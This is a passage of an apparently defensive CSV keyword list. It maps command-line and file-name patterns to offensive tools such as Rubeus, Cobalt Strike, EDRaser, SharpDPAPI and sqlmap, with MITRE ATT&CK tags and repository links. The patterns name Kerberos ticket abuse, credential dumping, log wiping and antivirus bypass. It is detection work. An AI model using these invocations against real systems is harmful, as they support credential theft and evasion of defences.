tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* amsi_disable *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* --am-si-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"* --Args AntiVirus --XorKey*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* --args whoami*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* arp.x64.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"* asktgs * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt /user *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktht /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asm.py -t * -ln -w resources/*.txt -o *","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"* asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* asreproast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --asreproast *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --asreproast *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --assemblyargs AntiVirus*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --assemblyargs AppLocker*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* Athena.Commands*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* Athena.Models.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* athena.mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* --attack bruteforce*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* --attack injection*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* --attack partial_d --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --attack partial_q --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -attack remote_db -db_type * -db_username * -db_password *","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* --attack vulns *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* -attack windows_application_event_log_local*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* -attack windows_event_log*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* -attack windows_security_event_log_remote*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* --attacker-host *","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"* --attacker-port *","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"* -attak syslog*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* --authmode ntlm --username * --password *","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"* auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* avred.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"* -b *.bin *.bin dump*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"* BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"* --backdoor *","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"* backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* backupkey* /server:* /file*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* bacnet-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* banner.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* base64_encode_shellcode*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"* --basic ""FUZZ:FUZ2Z""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --batch --dbs*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --batch --password*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* beacon.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 